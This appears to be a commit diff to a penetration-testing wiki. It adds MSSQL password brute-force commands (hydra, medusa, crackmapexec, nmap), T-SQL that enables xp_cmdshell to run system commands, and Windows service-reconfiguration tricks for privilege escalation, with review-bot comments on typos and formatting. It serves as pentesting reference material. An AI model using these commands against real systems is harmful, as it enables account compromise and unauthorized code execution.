GitBook: [master] 3 pages modified
This commit is contained in:
parent 9a083bb673
commit 3f541f3133
@ -298,6 +298,7 @@ hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for
```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
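Review bot: the hydra and medusa lines use a typographic en dash (`–P`, `–U`, `–M`) instead of an ASCII hyphen, so a shell hands them to the tool as literal positional arguments and neither hydra nor medusa will recognise the option; they should read `-P`, `-U` and `-M`. The comment on the nmap line should also read "Be careful with the number of passwords in the list", and the account-lockout caveat it carries applies just as much to the crackmapexec, hydra and medusa lines above it, so it belongs once at the top of the block rather than only on the last entry.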
@ -81,11 +81,16 @@ msf> use windows/manage/mssql_local_auth_bypass
### Execute commands
```bash
#Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
#Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
#this turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#this enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
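Review bot: `sp_configure 'xp_cmdshell', '1'` is written twice in a row (once under the "this enables xp_cmdshell" comment and again immediately below it); the second copy is redundant and should be removed. The block is also fenced as `bash` but mixes shell commands (the two crackmapexec lines) with T-SQL (`sp_configure`, `RECONFIGURE`, `EXEC master..xp_cmdshell 'whoami'`) whose comments start with `#`, which is not a T-SQL comment marker; moving the T-SQL into its own `sql` fence with `--` comments would let a reader paste either half as-is, and the first comment could then say plainly that `show advanced options` must be enabled before `xp_cmdshell` can be configured.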
@ -488,6 +488,12 @@ sc config SSDPSRV obj= ".\LocalSystem" password= ""
**Take into account that the service upnphost depends on SSDPSRV to work \(for XP SP1\)**
**Another workaround** of this problem is running:
```text
sc.exe config usosvc start= auto
```
### **Modify service binary path**
If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:
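Review bot: "Another workaround of this problem is running: sc.exe config usosvc start= auto" never says which problem it works around; the only issue named in the visible context is that upnphost depends on SSDPSRV (for XP SP1), and nothing explains how a different service, usosvc, relates to that, so the sentence should name the problem or sit next to the text it refers to. In the "Modify service binary path" paragraph, "it can modify the binary that is being executed by the service" is looser than the heading: the heading talks about the path, the sentence about the binary itself, and the two should agree (the path the service launches, as the heading says). The escaped `\(for XP SP1\)` and `SERVICE\_ALL\_ACCESS` are GitBook export artifacts that render correctly but read oddly in the raw markdown and could be unescaped.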